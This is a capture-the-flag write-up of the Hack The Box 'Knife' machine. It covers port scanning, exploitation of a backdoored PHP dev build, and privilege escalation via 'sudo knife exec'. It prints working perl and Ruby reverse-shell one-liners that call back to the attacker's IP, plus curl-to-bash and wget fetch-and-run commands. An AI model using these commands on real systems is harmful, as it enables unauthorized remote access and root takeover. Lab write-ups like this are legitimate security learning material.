HTB: Knife Writeup
There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!
Enumeration
I began the same as always, with an nmap scan
# Nmap 7.91 scan initiated Fri Jun 11 13:42:53 2021 as: nmap -sC -sV -oA nmap/knife 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.090s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 11 13:43:12 2021 -- 1 IP address (1 host up) scanned in 18.50 seconds
Browsing to port 80, there doesn’t appear to be much on it. Running Nikto to see if anything interesting pops up
$ nikto -host http://10.10.10.242
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.242
+ Target Hostname: 10.10.10.242
+ Target Port: 80
+ Start Time: 2021-06-11 13:45:33 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ 7863 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2021-06-11 13:56:18 (GMT-4) (645 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
That’s something interesting, a dev version of PHP, doing a little google search reveals exploit-db 49933.
Running it instantly gives a stateless interactive shell!
$ python3 49933.py
Enter the full host url:
http://10.10.10.242
Interactive shell is opened on http://10.10.10.242
Can't acces tty; job crontol turned off.
$ whoami
james
Crafting a simple perl reverse shell
$ cat rshell.pl
perl -e 'use Socket;$i="10.10.14.204";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And piping that through bash
$ curl 10.10.14.204/rshell.pl | bash
Success! We now have an ok interactive shell!
Privesc
After a big of looking around, it turns out that we can execute the knife programs as root. Exploring the help, there’s a very interesting line
** EXEC COMMANDS **
knife exec [SCRIPT] (options)
We can execute commands commands? Well that seems nice. After playing with this a bit, it turns out that it’s allows execution of Ruby scripts. So I crafted a little Ruby reverse shell as follows:
$ cat rshell.rb
exec("perl -e 'use Socket;$i=\"10.10.14.204\";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'")
Copied it over to the server and executed it with the knife program
$ wget 10.10.14.204/rshell.rb
$ sudo knife exec /tmp/rshell.rb
And catching that reverse shell gives us root!!